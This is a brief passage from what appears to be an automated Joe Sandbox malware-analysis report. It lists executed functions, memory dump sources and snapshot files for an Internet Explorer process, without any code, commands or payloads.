    • Snapshot File: hcaresult_1_2_400000_payload.jbxd

    Analysis Process: iexplore.exe PID: 3828 Parent PID: 3772

    Executed Functions

    Function 03410FC7, Relevance: .0, Instructions: 4
    Memory Dump Source
    • Source File: 00000004.00000003.22307780551.03410000.00000010.sdmp, Offset: 03410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_3_3410000_iexplore.jbxd
    Function 03410FCF, Relevance: .0, Instructions: 4
    Memory Dump Source
    • Source File: 00000004.00000003.22307780551.03410000.00000010.sdmp, Offset: 03410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_3_3410000_iexplore.jbxd
    Function 03410FD7, Relevance: .0, Instructions: 4
    Memory Dump Source
    • Source File: 00000004.00000003.22307780551.03410000.00000010.sdmp, Offset: 03410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_3_3410000_iexplore.jbxd

    Non-executed Functions